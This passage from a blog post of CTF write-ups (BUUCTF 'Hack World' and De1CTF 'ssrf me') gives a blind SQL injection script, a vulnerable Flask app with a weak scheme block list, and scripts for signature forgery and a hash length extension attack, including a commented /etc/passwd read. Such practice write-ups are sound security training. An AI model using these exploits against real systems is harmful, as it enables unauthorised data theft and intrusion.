<p>&gt;&gt;&gt;‘9999999999999999’&lt;’a’<br>True</p>
</blockquote>
</blockquote>
<p>然后就开始上脚本跑叭：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://f6c08544-9822-459f-94e1-2028af27b3b2.node1.buuoj.cn/index.php"</span></span><br><span class="line">s = requests.session()</span><br><span class="line">i = <span class="number">1</span></span><br><span class="line">flag = <span class="string">''</span></span><br><span class="line"><span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">	status = <span class="number">1</span></span><br><span class="line">	<span class="keyword">for</span> x <span class="keyword">in</span> <span class="string">'abcdefghijklmnopqrstuvwxyz0123456789&#123;&#125;-'</span>:</span><br><span class="line">		payload = <span class="string">"0^(ascii(substr((select(flag)from(flag)),&#123;0&#125;,1))=&#123;1&#125;)"</span>.format(str(i),str(ord(x)))</span><br><span class="line">		data = &#123;</span><br><span class="line">			<span class="string">'id'</span>: payload</span><br><span class="line">		&#125;</span><br><span class="line">		html = s.post(url,data=data).text</span><br><span class="line">		<span class="keyword">if</span> <span class="string">"Hello, glzjin wants a girlfriend."</span> <span class="keyword">in</span> html:</span><br><span class="line">			flag += x</span><br><span class="line">			status = <span class="number">1</span></span><br><span class="line">			print(flag)</span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			status = <span class="number">0</span></span><br><span class="line">	<span class="keyword">if</span> status == <span class="number">0</span>:</span><br><span class="line">		print(<span class="string">"flag is above!~"</span>)</span><br><span class="line">	i+=<span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>大概跑个两分钟左右就有flag啦~</p>
<hr>
<h3 id="ssrf-me"><a href="#ssrf-me" class="headerlink" title="ssrf me"></a>ssrf me</h3><blockquote>
<p>De1ta 2019</p>
</blockquote>
<blockquote>
<p>参考wp：<br><a href="https://ctftime.org/writeup/16070" target="_blank" rel="noopener">https://ctftime.org/writeup/16070</a></p>
<p>官方wp：<br>[<a href="https://github.com/De1ta-team/De1CTF2019/tree/master/writeup/web/SSRF%20Me]" target="_blank" rel="noopener">https://github.com/De1ta-team/De1CTF2019/tree/master/writeup/web/SSRF%20Me]</a>(<a href="https://github.com/De1ta-team/De1CTF2019/tree/master/writeup/web/SSRF" target="_blank" rel="noopener">https://github.com/De1ta-team/De1CTF2019/tree/master/writeup/web/SSRF</a> Me)</p>
</blockquote>
<p>题目给了接口的Flask应用程序的源代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! /usr/bin/env python </span></span><br><span class="line"><span class="comment">#encoding=utf-8 </span></span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask </span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request </span><br><span class="line"><span class="keyword">import</span> socket </span><br><span class="line"><span class="keyword">import</span> hashlib </span><br><span class="line"><span class="keyword">import</span> urllib </span><br><span class="line"><span class="keyword">import</span> sys </span><br><span class="line"><span class="keyword">import</span> os </span><br><span class="line"><span class="keyword">import</span> json </span><br><span class="line"></span><br><span class="line">reload(sys) </span><br><span class="line">sys.setdefaultencoding(<span class="string">'latin1'</span>) </span><br><span class="line">app = Flask(__name__) secert_key = os.urandom(<span class="number">16</span>) </span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Task</span>:</span> </span><br><span class="line">	<span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self, action, param, sign, ip)</span>:</span> </span><br><span class="line">		self.action = action </span><br><span class="line">		self.param = param </span><br><span class="line">		self.sign = sign </span><br><span class="line">		self.sandbox = md5(ip) </span><br><span class="line">		<span class="keyword">if</span>(<span class="keyword">not</span> os.path.exists(self.sandbox)): </span><br><span class="line">			<span class="comment">#SandBox For Remote_Addr </span></span><br><span class="line">			os.mkdir(self.sandbox) </span><br><span class="line"></span><br><span class="line">		<span class="function"><span class="keyword">def</span> <span class="title">Exec</span><span class="params">(self)</span>:</span> </span><br><span class="line">			result = &#123;&#125; </span><br><span class="line">			result[<span class="string">'code'</span>] = <span class="number">500</span> </span><br><span class="line">			<span class="keyword">if</span> (self.checkSign()): </span><br><span class="line">				<span class="keyword">if</span> <span class="string">"scan"</span> <span class="keyword">in</span> self.action: </span><br><span class="line">					tmpfile = open(<span class="string">"./%s/result.txt"</span> % self.sandbox, <span class="string">'w'</span>) </span><br><span class="line">					resp = scan(self.param) </span><br><span class="line">					<span class="keyword">if</span> (resp == <span class="string">"Connection Timeout"</span>): </span><br><span class="line">						result[<span class="string">'data'</span>] = resp </span><br><span class="line">					<span class="keyword">else</span>: </span><br><span class="line">						<span class="keyword">print</span> resp </span><br><span class="line">						tmpfile.write(resp) </span><br><span class="line">						tmpfile.close() result[<span class="string">'code'</span>] = <span class="number">200</span> </span><br><span class="line">				<span class="keyword">if</span> <span class="string">"read"</span> <span class="keyword">in</span> self.action: </span><br><span class="line">					f = open(<span class="string">"./%s/result.txt"</span> % self.sandbox, <span class="string">'r'</span>) </span><br><span class="line">					result[<span class="string">'code'</span>] = <span class="number">200</span> </span><br><span class="line">					result[<span class="string">'data'</span>] = f.read() </span><br><span class="line">				<span class="keyword">if</span> result[<span class="string">'code'</span>] == <span class="number">500</span>: </span><br><span class="line">					result[<span class="string">'data'</span>] = <span class="string">"Action Error"</span> </span><br><span class="line">				<span class="keyword">else</span>: </span><br><span class="line">					result[<span class="string">'code'</span>] = <span class="number">500</span> </span><br><span class="line">					result[<span class="string">'msg'</span>] = <span class="string">"Sign Error"</span> </span><br><span class="line">					<span class="keyword">return</span> result</span><br><span class="line">		<span class="function"><span class="keyword">def</span> <span class="title">checkSign</span><span class="params">(self)</span>:</span> </span><br><span class="line">			<span class="keyword">if</span> (getSign(self.action, self.param) == self.sign): </span><br><span class="line">				<span class="keyword">return</span> <span class="literal">True</span> </span><br><span class="line">			<span class="keyword">else</span>: </span><br><span class="line">				<span class="keyword">return</span> <span class="literal">False</span> </span><br><span class="line"></span><br><span class="line"><span class="comment">#generate Sign For Action Scan. </span></span><br><span class="line"><span class="meta">@app.route("/geneSign", methods=['GET', 'POST']) </span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">geneSign</span><span class="params">()</span>:</span> </span><br><span class="line">	param = urllib.unquote(request.args.get(<span class="string">"param"</span>, <span class="string">""</span>)) </span><br><span class="line">	action = <span class="string">"scan"</span> </span><br><span class="line">	<span class="keyword">return</span> getSign(action, param) </span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/De1ta',methods=['GET','POST']) </span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">challenge</span><span class="params">()</span>:</span> </span><br><span class="line">	action = urllib.unquote(request.cookies.get(<span class="string">"action"</span>)) </span><br><span class="line">	param = urllib.unquote(request.args.get(<span class="string">"param"</span>, <span class="string">""</span>)) </span><br><span class="line">	sign = urllib.unquote(request.cookies.get(<span class="string">"sign"</span>)) </span><br><span class="line">	ip = request.remote_addr </span><br><span class="line">	<span class="keyword">if</span>(waf(param)): </span><br><span class="line">		<span class="keyword">return</span> <span class="string">"No Hacker!!!!"</span> </span><br><span class="line">	task = Task(action, param, sign, ip) </span><br><span class="line">	<span class="keyword">return</span> json.dumps(task.Exec()) </span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/') </span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span> </span><br><span class="line">	<span class="keyword">return</span> open(<span class="string">"code.txt"</span>,<span class="string">"r"</span>).read() </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">scan</span><span class="params">(param)</span>:</span> </span><br><span class="line">	socket.setdefaulttimeout(<span class="number">1</span>) </span><br><span class="line">	<span class="keyword">try</span>: </span><br><span class="line">		<span class="keyword">return</span> urllib.urlopen(param).read()[:<span class="number">50</span>] </span><br><span class="line">	<span class="keyword">except</span>: </span><br><span class="line">		<span class="keyword">return</span> <span class="string">"Connection Timeout"</span> </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getSign</span><span class="params">(action, param)</span>:</span> </span><br><span class="line">	<span class="keyword">return</span> hashlib.md5(secert_key + param + action).hexdigest() </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">md5</span><span class="params">(content)</span>:</span> </span><br><span class="line">	<span class="keyword">return</span> hashlib.md5(content).hexdigest() </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">waf</span><span class="params">(param)</span>:</span> </span><br><span class="line">	check=param.strip().lower() </span><br><span class="line">	<span class="keyword">if</span> check.startswith(<span class="string">"gopher"</span>) <span class="keyword">or</span> check.startswith(<span class="string">"file"</span>): </span><br><span class="line">		<span class="keyword">return</span> <span class="literal">True</span> </span><br><span class="line">	<span class="keyword">else</span>: <span class="keyword">return</span> <span class="literal">False</span> </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>: </span><br><span class="line">	app.debug = <span class="literal">False</span> </span><br><span class="line">	app.run(host=<span class="string">'0.0.0.0'</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<hr>
<h4 id="解法一（非预期解）："><a href="#解法一（非预期解）：" class="headerlink" title="解法一（非预期解）："></a>解法一（非预期解）：</h4><p>内容大概是利用<code>flask</code>写了一个<code>task</code>类和以下三个路由：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">/geneSign</span><br><span class="line">return getSign(action, param)</span><br><span class="line">生成签名。</span><br><span class="line"></span><br><span class="line">/De1ta</span><br><span class="line">执行challenge()函数，</span><br><span class="line">利用cookies和GET方式提交的参数中的action，param，sign构造一个新的Task对象，</span><br><span class="line">然后调用Exec()方法，返回json结果。</span><br><span class="line"></span><br><span class="line">/</span><br><span class="line">获取源码。</span><br></pre></td></tr></table></figure>

<p>分析一下<code>Exec()</code>函数：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Exec(self)</span><br><span class="line">首先调用了checkSign()函数，检查sign的值是否和getSign()运算结果一致。</span><br></pre></td></tr></table></figure>

<p>而在<code>checkSign()</code>函数中，调用了<code>getSign()</code>函数：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">getSign(action, param)</span><br><span class="line">将secret_key，param和action拼接然后md5</span><br></pre></td></tr></table></figure>

<p>必须要通过过<code>getSign()</code>的检查才能继续执行<code>Exec()</code>函数。在<code>getSign()</code>函数中，是将<code>secret_key + param + action</code>三个参数拼接之后进行md5计算。其中，<code>secret_key</code>是App产生的随机值，我们是不可能知道的。那还有哪儿可以产生sign呢？<code>geneSign()</code>函数：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">geneSign</span><span class="params">()</span>:</span> </span><br><span class="line">	param = urllib.unquote(request.args.get(<span class="string">"param"</span>, <span class="string">""</span>)) </span><br><span class="line">	action = <span class="string">"scan"</span> </span><br><span class="line">	<span class="keyword">return</span> getSign(action, param)</span><br></pre></td></tr></table></figure>

<p>通过向<code>/geneSign</code>发送请求，会生成一个sign值，不过它只允许我们传递一个<code>param</code>值，并且<code>acion</code>的值被设置为了<code>&quot;scan&quot;</code>。</p>
<p>有了一个有效的sign值，就能通过检查，<code>Exec()</code>继续执行。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">检查action中是否有scan，如果有则将scan读到的内容写入沙盒中的文件。</span><br><span class="line">检查action中是否有read，如果有则将刚才写入的文件读出。</span><br></pre></td></tr></table></figure>

<p>来看一看<code>scan</code>函数：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">scan</span><span class="params">(param)</span>:</span> </span><br><span class="line">	socket.setdefaulttimeout(<span class="number">1</span>) </span><br><span class="line">	<span class="keyword">try</span>: </span><br><span class="line">		<span class="keyword">return</span> urllib.urlopen(param).read()[:<span class="number">50</span>] </span><br><span class="line">	<span class="keyword">except</span>: </span><br><span class="line">		<span class="keyword">return</span> <span class="string">"Connection Timeout"</span></span><br></pre></td></tr></table></figure>

<p>它调用了我们的<code>param</code>，使用<code>urllib.urlopen()</code>执行请求。</p>
<p>如果想要读取本地文件，我们一般会用<code>&quot;file://&quot;</code>协议，但是在<code>/De1ta</code>路由中，调用了<code>waf(param)</code>进行检查，waf()函数内容为：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">waf</span><span class="params">(param)</span>:</span> </span><br><span class="line">	check=param.strip().lower() </span><br><span class="line">	<span class="keyword">if</span> check.startswith(<span class="string">"gopher"</span>) <span class="keyword">or</span> check.startswith(<span class="string">"file"</span>): </span><br><span class="line">		<span class="keyword">return</span> <span class="literal">True</span> </span><br><span class="line">	<span class="keyword">else</span>: <span class="keyword">return</span> <span class="literal">False</span></span><br></pre></td></tr></table></figure>

<p>它检查<code>param</code>是否是以<code>gopher</code>或者<code>file</code>开头，如果是，在<code>challenge()</code>函数中就会直接返回<code>&quot;No Hacker!!!!&quot;</code></p>
<p>题目有给一个hint：</p>
<blockquote>
<p>flag is in ./flag.txt</p>
</blockquote>
<p>如果要读取这个<code>flag.txt</code>文件，就必须要有一个有效的<code>sign</code>并且<code>action</code>中包含有<code>&quot;read&quot;</code>。默认情况下，<code>getSign</code>生成的是<code>action=&quot;scan&quot;</code>的签名。如果我们能够伪造一个<code>&quot;readscan&quot;</code>给<code>action</code>，那就可以成功地读取文件了。</p>
<p><code>geneSign()</code>函数会调用<code>getSign()</code>，将三个参数拼接之后，再进行md5哈希计算，所以我们可以传递<code>&quot;flag.txtread&quot;</code>给<code>param</code>，因为：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">param = <span class="string">"flag.txtread"</span></span><br><span class="line">action = <span class="string">"scan"</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">param = <span class="string">"flag.txt"</span></span><br><span class="line">action = <span class="string">"readscan"</span></span><br></pre></td></tr></table></figure>

<p>以上两种情况，会生成相同的哈希值。</p>
<p>上脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">geneSign</span><span class="params">(param)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> requests.get(<span class="string">"http://127.0.0.1:8083/geneSign?param="</span>+param).text</span><br><span class="line"></span><br><span class="line">Param = <span class="string">"flag.txt"</span></span><br><span class="line">param = Param+<span class="string">"read"</span></span><br><span class="line">sign = geneSign(param)</span><br><span class="line">param = Param</span><br><span class="line">action = <span class="string">"readscan"</span></span><br><span class="line">flag = requests.get(<span class="string">"http://127.0.0.1:8083/De1ta?param="</span>+param, cookies=&#123;<span class="string">"action"</span>:action,<span class="string">"sign"</span>:sign&#125;).text</span><br><span class="line"></span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure>

<blockquote>
<p>复现环境下的flag实在是太真实了叭…</p>
<p><img src="/img/BUUCTF-WEB/20190908201424.png" alt="20190908201424"></p>
</blockquote>
<hr>
<h4 id="解法二（预期解）：哈希长度扩展攻击"><a href="#解法二（预期解）：哈希长度扩展攻击" class="headerlink" title="解法二（预期解）：哈希长度扩展攻击"></a>解法二（预期解）：哈希长度扩展攻击</h4><p>原理官方文档都有，就不赘述了。可以利用hashpump - -</p>
<p><img src="/img/BUUCTF-WEB/20190908201008.png" alt="20190908201008"></p>
<p>然后在请求头中添加Cookie值 - -</p>
<p><img src="/img/BUUCTF-WEB/20190908200909.png" alt="20190908200909"></p>
<p>也可以直接上脚本，这里直接搬<a href="https://www.zhaoj.in/read-6170.html" target="_blank" rel="noopener">赵师傅</a>的了☺(python2)：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashpumpy</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"></span><br><span class="line">url = <span class="string">'flag.txt'</span></span><br><span class="line"><span class="comment"># url = 'local-file:/etc/passwd'</span></span><br><span class="line">r = requests.get(<span class="string">'http://127.0.0.1:8083/geneSign'</span>, params=&#123;<span class="string">'param'</span>: url&#125;)</span><br><span class="line">sign = r.text</span><br><span class="line">hash_sign = hashpumpy.hashpump(sign, url + <span class="string">'scan'</span>, <span class="string">'read'</span>, <span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">r = requests.get(<span class="string">'http://127.0.0.1:8083/De1ta'</span>, params=&#123;<span class="string">'param'</span>: url&#125;, cookies=&#123;</span><br><span class="line">    <span class="string">'sign'</span>: hash_sign[<span class="number">0</span>],</span><br><span class="line">    <span class="string">'action'</span>: urllib.quote(hash_sign[<span class="number">1</span>][len(url):])</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<hr>
<center><iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="386" height="86" src="//music.163.com/outchain/player?type=2&id=539420&auto=1&height=66"></iframe>

</center>
    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>Author：<a href="http://yoursite.com">Laurel</a>
            <p>原文链接：<a href="http://yoursite.com/2019/09/06/BUUCTF-WEB/">http://yoursite.com/2019/09/06/BUUCTF-WEB/</a>
            <p>发表日期：<a href="http://yoursite.com/2019/09/06/BUUCTF-WEB/">September 6th 2019, 11:12:42 pm</a>
            <p>更新日期：<a href="http://yoursite.com/2019/09/06/BUUCTF-WEB/">September 8th 2019, 8:33:17 am</a>
            <p>版权声明：本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/2019/09/09/Java-遥控风扇/" title= "Java-遥控风扇">
                    <div class="nextTitle">Java-遥控风扇</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/2019/08/31/SQL-injection-with-raw-MD5-hashes/" title= "SQL injection with raw MD5 hashes">
                    <div class="prevTitle">SQL injection with raw MD5 hashes</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:laure1@yeah.net" class="iconfont-archer email" title=email ></a>
            
        
    
        
    
        
            
                <span class="iconfont-archer wechat" title=wechat>
                  
                  <img class="profile-qr" src="/assets/wechat.jpg" />
                </span>
            
        
    
        
            
                <span class="iconfont-archer qq" title=qq>
                  
                  <img class="profile-qr" src="/assets/qq.jpg" />
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
            
                <a href="/1aur2l" class="iconfont-archer instagram" target="_blank" title=instagram></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
    
    <script src="https://eqcn.ajz.miesnfu.com/wp-content/plugins/wp-3d-pony/live2dw/lib/L2Dwidget.min.js"></script>
    <script>
    L2Dwidget.init({
        "model": {
            jsonPath: "https://unpkg.com/live2d-widget-model-tororo@1.0.5/assets/tororo.model.json",
            "scale": 1
        },
        "display": {
            "position": "right", 
            "width": 150,  
            "height": 300, 
            "hOffset": -60,
            "vOffset": -150
        },
        "mobile": {
            "show": true,
            "scale": 0.5
        },
        "react": {
            "opacityDefault": 1,
            "opacityOnHover": 1
        },

    });
    </script>

</footer>

    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#随便注"><span class="toc-number">1.</span> <span class="toc-text">随便注</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#解法一：堆叠注入"><span class="toc-number">1.1.</span> <span class="toc-text">解法一：堆叠注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#解法二："><span class="toc-number">1.2.</span> <span class="toc-text">解法二：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#easy-tornado"><span class="toc-number">2.</span> <span class="toc-text">easy_tornado</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#高明的黑阔"><span class="toc-number">3.</span> <span class="toc-text">高明的黑阔</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Hack-World"><span class="toc-number">4.</span> <span class="toc-text">Hack World</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ssrf-me"><span class="toc-number">5.</span> <span class="toc-text">ssrf me</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#解法一（非预期解）："><span class="toc-number">5.1.</span> <span class="toc-text">解法一（非预期解）：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#解法二（预期解）：哈希长度扩展攻击"><span class="toc-number">5.2.</span> <span class="toc-text">解法二（预期解）：哈希长度扩展攻击</span></a></li></ol></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 5
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/09</span><a class="archive-post-title" href= "/2019/09/09/Java-遥控风扇/" >Java-遥控风扇</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/06</span><a class="archive-post-title" href= "/2019/09/06/BUUCTF-WEB/" >BUUCTF-WEB</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/31</span><a class="archive-post-title" href= "/2019/08/31/SQL-injection-with-raw-MD5-hashes/" >SQL injection with raw MD5 hashes</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/29</span><a class="archive-post-title" href= "/2019/08/29/Summary-of-Web/" >Summary of Web</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/19</span><a class="archive-post-title" href= "/2019/08/19/Summary-of-Misc/" >Summary of Misc</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="Web"><span class="iconfont-archer">&#xe606;</span>Web</span>
    
        <span class="sidebar-tag-name" data-tags="Brush"><span class="iconfont-archer">&#xe606;</span>Brush</span>
    
        <span class="sidebar-tag-name" data-tags="Java"><span class="iconfont-archer">&#xe606;</span>Java</span>
    
        <span class="sidebar-tag-name" data-tags="SQL"><span class="iconfont-archer">&#xe606;</span>SQL</span>
    
        <span class="sidebar-tag-name" data-tags="Misc"><span class="iconfont-archer">&#xe606;</span>Misc</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
